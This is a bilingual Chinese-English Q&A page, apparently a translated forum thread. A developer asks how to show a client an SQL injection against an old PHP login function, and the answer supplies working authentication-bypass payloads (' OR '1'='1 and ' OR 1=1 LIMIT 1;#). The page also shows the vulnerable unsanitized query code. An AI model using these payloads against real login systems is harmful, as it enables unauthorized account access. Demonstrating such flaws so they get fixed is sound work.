如何在登录过程中注入sql [英] how to inject sql in login process

问题描述

我收到了一个旧的应用程序，它完全没有对用户输入进行清理，并且容易受到 sql 注入的影响.为了证明情况的严重性，我需要给客户一个例子，还有什么比登录过程更能吓到他.我已经尝试过标准技术，但它们的问题在于它们返回多行，并且由于代码的性质，它返回一个错误而不是让他登录.我应该注入什么 sql 以便只返回一行并执行到达return $access"行，以便将此access"列的值传递给调用此登录函数的代码.请求是通过 POST 方法发出的，并且在服务器上关闭了魔术引号.如果您需要任何其他信息，请告诉我.

I've received an old application which completely lacks user input sanitization and is vulnerable to sql injection. To prove gravity of the situation i need to give client an example and what can be better to scare him than the login process. I've tried standard techniques but the problem with them is that they return multiple rows and due to nature of the code it returns an error instead of logging him in. What sql should i inject so that only a single row is returned and the execution reaches "return $access" line in order to pass the value of this "access" column to code calling this login function. The request is made via POST method and magic quotes are off on the server. Please let me know if you need any other information.

function login($username, $pw)
{
    global $dbname, $connection, $sqluser, $sqlpw;
    $db = mysql_connect($connection,$sqluser,$sqlpw); 
    mysql_select_db($dbname);
    if(!($dba = mysql_query("select * from users where username = '$username' AND password = '$pw'"))){
        printf("%s", sprintf("internal error5 %d:%s\n", mysql_errno(), mysql_error()));
        exit();
    }
    $row = mysql_fetch_array($dba);
    $access = $row['access'];
    if ($access != ''){
     return $access;
    } else {
        return "error occured";
    }
    mysql_close ($db);
}

注意:原来是开启了magic_quotes_gpc，php版本是5.2.17

Note: it turns out that magic_quotes_gpc is turned on and the php version is 5.2.17

谢谢

推荐答案

从目标查询开始:

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

我们得到用户名是 ' OR '1'='1 和密码是 ' OR 1=1 LIMIT 1;#

We get username is ' OR '1'='1 and password is ' OR 1=1 LIMIT 1;#

这篇关于如何在登录过程中注入sql的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！